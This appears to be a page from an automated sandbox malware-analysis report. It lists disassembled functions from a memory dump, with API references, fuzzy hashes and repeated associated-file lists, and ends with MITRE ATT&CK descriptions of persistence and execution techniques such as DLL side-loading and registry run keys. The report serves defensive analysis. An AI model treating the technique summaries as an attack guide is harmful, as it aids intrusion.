Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: DeallocTransform@@malloc
String ID: J9d
API String ID: 1381424447-3323460095
Opcode ID: 4eca4673d2780f729c0543226dba1fa40189bce998e36a264208062640644cab
Instruction ID: cfd7647b8d9cdd9ec9429426ac46893b5078753ef1a7995942731d5cafc02ecb
Opcode Fuzzy Hash: 4eca4673d2780f729c0543226dba1fa40189bce998e36a264208062640644cab
Instruction Fuzzy Hash: 9C31AEA2A0DF8582EB51CF29E84426D33A8FB99B84F259271DF4C17721EF39E5818700

Function 00007FFB9A31BC80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

PyBool_FromLong.PYTHON3 ref: 00007FFB9A31BD2A

Strings

1J1, xrefs: 00007FFB9A31BCC5

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Bool_FromLong
String ID: 1J1
API String ID: 2610644205-2174808320
Opcode ID: 62177cc19be644c5318a970b121010dfc96895e7f3fc762ed8b04c97761c9ff5
Instruction ID: e9959c62a6e5baeeb78eb06c2e3f95c4cec8fbca9178b30f92398e2d0cc9d3d8
Opcode Fuzzy Hash: 62177cc19be644c5318a970b121010dfc96895e7f3fc762ed8b04c97761c9ff5
Instruction Fuzzy Hash: 7C216FB6B08B41C2FA218F26E44416973A8FB89BD4F148176EE4D13B64DF3CE486CB10

Function 00007FFB9A367AF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

?createObject@QTextDocument@@MEAAPEAVQTextObject@@AEBVQTextFormat@@@Z.QT5GUI ref: 00007FFB9A367B3A
??0QFont@@QEAA@AEBV0@@Z.QT5GUI ref: 00007FFB9A367B7B

Strings

createObject, xrefs: 00007FFB9A367AFD

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Text$?createDocument@@Font@@Format@@@Object@Object@@V0@@
String ID: createObject
API String ID: 2532943642-299252263
Opcode ID: 52e45fd438f384f9dc00094440b7b9f97ab3eb64d2c4cf26df03f1e967ac2c2c
Instruction ID: d0360f099c4e8a32e099bc2bddca57de48cdc891fd0f61b817dd7d933b97b7c4
Opcode Fuzzy Hash: 52e45fd438f384f9dc00094440b7b9f97ab3eb64d2c4cf26df03f1e967ac2c2c
Instruction Fuzzy Hash: 682141B6608B4182EB248F66F8442697764FB98BD8F144175EE8D13768DF3CE145C704

Function 00007FFB9A31DEB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON3 ref: 00007FFB9A31DF65

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

??GQRegion@@QEBA?BV0@AEBV0@@Z.QT5GUI ref: 00007FFB9A31DF22

Strings

J9J9, xrefs: 00007FFB9A31DEDD

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: DeallocRegion@@V0@@malloc
String ID: J9J9
API String ID: 2721989731-2881787613
Opcode ID: e9385aea60245421b889753081b914d4f15d5281564381813d9448da1f62e009
Instruction ID: a5f593ddb45e192daeed4ec3acf7d65b80fc0d497ae5cd1eb7cada7ade28189e
Opcode Fuzzy Hash: e9385aea60245421b889753081b914d4f15d5281564381813d9448da1f62e009
Instruction Fuzzy Hash: 01215CB6B1CB41C2EB61CB25E8482A973A9FB99BC0F554176DE5C43764DF3CD5408710

Function 00007FFB9A353C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON3 ref: 00007FFB9A353CE5

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

??UQPainterPath@@QEBA?AV0@AEBV0@@Z.QT5GUI ref: 00007FFB9A353CA2

Strings

J9J9, xrefs: 00007FFB9A353C5D

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: DeallocPainterPath@@V0@@malloc
String ID: J9J9
API String ID: 3358426265-2881787613
Opcode ID: f1956ed14ec7a28130940f003eef32ba6ba9bfcf400e910d8c358bf818651b78
Instruction ID: 9ecb084a7072c0e3d9cf3a83b2b528dfe164354b4f02708798e02fa4d158069f
Opcode Fuzzy Hash: f1956ed14ec7a28130940f003eef32ba6ba9bfcf400e910d8c358bf818651b78
Instruction Fuzzy Hash: A8217CB2B0CB4582EB60CB2AE85826933A9FB89BC0F654176DE5D037A4DF3CD440CB00

Function 00007FFB9A31D9A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON3 ref: 00007FFB9A31DA55

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

??TQRegion@@QEBA?BV0@AEBV0@@Z.QT5GUI ref: 00007FFB9A31DA12

Strings

J9J9, xrefs: 00007FFB9A31D9CD

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: DeallocRegion@@V0@@malloc
String ID: J9J9
API String ID: 2721989731-2881787613
Opcode ID: d7579a7eedf6d7dc8e5562b1eb984eef0869274ab665acd7b012c15386c248b1
Instruction ID: 7d01645865f530577cfccecf7bcaa7cea78a8e1fd7423d3dc75cd4011c1243d9
Opcode Fuzzy Hash: d7579a7eedf6d7dc8e5562b1eb984eef0869274ab665acd7b012c15386c248b1
Instruction Fuzzy Hash: A4217CB2B0CB45C2EB61CB25E84826933A9FB89BC0F558175DE5D03764DF3CD5408B00

Function 00007FFB9A33DAD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

PyBool_FromLong.PYTHON3 ref: 00007FFB9A33DB5E

Strings

1J9, xrefs: 00007FFB9A33DB22

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Bool_FromLong
String ID: 1J9
API String ID: 2610644205-2407233842
Opcode ID: 3e0e32757434ec80e3b79828fe032dc9b677b45b792b156fa140777409428cee
Instruction ID: 812a55264225fef2eaf035b90912b7cce2484cebec0d918c74b197a75a37aa98
Opcode Fuzzy Hash: 3e0e32757434ec80e3b79828fe032dc9b677b45b792b156fa140777409428cee
Instruction Fuzzy Hash: A5215CB5A0CB92C2EB609B65F40426AB368FB85BD8F5445B6DE8D13B68DF7CD045C700

Function 00007FFB9A329AC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON

Download Yara Rule

APIs

PyFloat_FromDouble.PYTHON3 ref: 00007FFB9A329B12

Strings

x(self) -> float, xrefs: 00007FFB9A329B24
QVector3D, xrefs: 00007FFB9A329B37

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: DoubleFloat_From
String ID: QVector3D$x(self) -> float
API String ID: 329246742-1354567454
Opcode ID: b164fee976c082549ce9376180b61b546f2038105489a99689e004863fd58a94
Instruction ID: 5d7797d9d01676c90b656be367abed3df721af1ad7b343b06c99b10392e30eab
Opcode Fuzzy Hash: b164fee976c082549ce9376180b61b546f2038105489a99689e004863fd58a94
Instruction Fuzzy Hash: 1F011EB5B08A4AC1EB11CF75D8486A837A8FB55744FA18072CA5C13320DF7CD59AC740

Function 00007FFB9A355A10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON

Download Yara Rule

APIs

PyFloat_FromDouble.PYTHON3 ref: 00007FFB9A355A63

Strings

QQuaternion, xrefs: 00007FFB9A355A88
z(self) -> float, xrefs: 00007FFB9A355A75

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: DoubleFloat_From
String ID: QQuaternion$z(self) -> float
API String ID: 329246742-1128012678
Opcode ID: 99039d9004db0801bcfc5a1a37d3018496c2abebcca86cea28bae023adb2a50d
Instruction ID: 54229bdebf3d33543cfbc131b4f2135c60a6c82ccbb60c2944ad6a8295e85614
Opcode Fuzzy Hash: 99039d9004db0801bcfc5a1a37d3018496c2abebcca86cea28bae023adb2a50d
Instruction Fuzzy Hash: 170171B1A08B8AC0EB10CF75D8886A833A8FB55744F958072CA4C03320DF7CD649C740

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
